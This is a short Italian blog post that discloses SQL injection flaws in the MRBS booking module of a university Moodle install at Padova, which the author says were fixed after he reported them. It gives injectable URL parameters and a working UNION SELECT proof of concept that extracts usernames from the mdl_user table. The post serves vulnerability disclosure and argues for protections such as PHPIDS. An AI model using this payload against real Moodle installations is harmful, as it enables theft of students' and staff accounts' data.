Vulnerabilità su Moodle

Moodle è una piattaforma opensource molto utilizzata in ambito universitario per l'elearning. Ultimamente a Padova sono state corrette alcune vulnerabilità, in seguito alla mia segnalazione, del tipo SQL Injection. Inserisco di seguito alcuni esempi: PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=[SQL]&day=27&month=10&year=2007 PATH/moodle/ing/blocks/mrbs/code/web/month.php?area=1&room=[SQL]/* Ma quello che poi mi chiedo è: come mai una piattaforma così vulnerabile (1 , 2) (anche perché relativamente "nuova") viene utilizzata senza protezioni? PHPIDS, ad esempio, potrebbe risultare un'ottima implementazione, almeno in via temporanea. Aggiornamento: in particolare le vulnerabilità da me elencate riguardano l'implementazione del modulo MRBS. POC: PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007

---

Questo articolo è stato pubblicato il 31-12-1969 alle 18:33 e classificato in .